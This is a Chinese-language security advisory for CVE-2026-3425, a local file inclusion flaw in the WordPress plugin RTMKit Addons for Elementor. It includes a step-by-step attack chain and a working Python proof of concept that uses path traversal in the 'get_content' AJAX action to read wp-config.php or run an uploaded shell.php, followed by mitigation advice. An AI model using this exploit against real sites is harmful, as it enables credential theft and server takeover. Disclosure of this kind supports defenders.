IPBUF安全漏洞报告
English
CVE-2026-3425 CVSS 8.8 高危

CVE-2026-3425 RTMKit插件本地文件包含漏洞

披露日期: 2026-05-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-3425
漏洞类型
本地文件包含
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
RTMKit Addons for Elementor

相关标签

LFIWordPressRCERTMKitCVE-2026-3425Elementor

漏洞概述

WordPress插件RTMKit Addons for Elementor在2.0.2及以下版本中存在本地文件包含漏洞。由于'get_content' AJAX操作的'path'参数缺乏有效过滤,拥有Author及以上权限的认证攻击者可利用该漏洞包含并执行服务器上的任意PHP文件,可能导致敏感数据泄露或服务器被完全控制。

技术细节

该漏洞源于插件处理AJAX请求时未对用户输入进行严格验证。具体位于`PluginApi.php`中,`get_content`函数直接接收`path`参数并将其用于文件包含操作。攻击者利用路径遍历技术(如../)可突破目录限制。由于WordPress允许认证用户上传文件,攻击者可先上传包含恶意PHP代码的图片,再利用此漏洞包含该文件,最终导致服务器端代码执行,获取服务器权限。

攻击链分析

STEP 1
步骤1:信息收集
攻击者扫描目标WordPress站点,确认安装了RTMKit Addons for Elementor插件且版本低于等于2.0.2。
STEP 2
步骤2:获取凭证
攻击者通过暴力破解、社会工程学或利用其他漏洞获取一个具有Author(作者)或更高权限的WordPress账户凭证。
STEP 3
步骤3:构造恶意请求
攻击者登录后台获取会话Cookie,构造发送至admin-ajax.php的POST请求,参数action为get_content,path设置为恶意文件路径(如../../wp-config.php或上传的恶意PHP文件)。
STEP 4
步骤4:执行攻击
服务器端接收到请求,直接包含并执行path参数指定的文件,导致敏感信息泄露或恶意代码执行。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2026-3425 Proof of Concept # Target: RTMKit Addons for Elementor <= 2.0.2 # Privileges: Author or higher required target_url = "http://example.com/wp-admin/admin-ajax.php" # Replace with a valid authenticated cookie of a user with Author role or higher cookies = { "wordpress_logged_in_12345": "your_cookie_value_here" } # The 'path' parameter is vulnerable to LFI # Example 1: Reading a sensitive configuration file data = { "action": "get_content", "path": "../../../../wp-config.php" } # Example 2: Including an uploaded malicious file (if file upload is possible) # data = { # "action": "get_content", # "path": "../../../../wp-content/uploads/2026/05/shell.php" # } try: response = requests.post(target_url, data=data, cookies=cookies) if response.status_code == 200: print("[+] Request successful. Response content:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

RTMKit Addons for Elementor <= 2.0.2

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用该插件。同时,严格审查并清理不必要的用户账户,加强对上传文件类型的检查,并确保服务器文件权限配置正确,防止通过目录遍历访问敏感文件。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表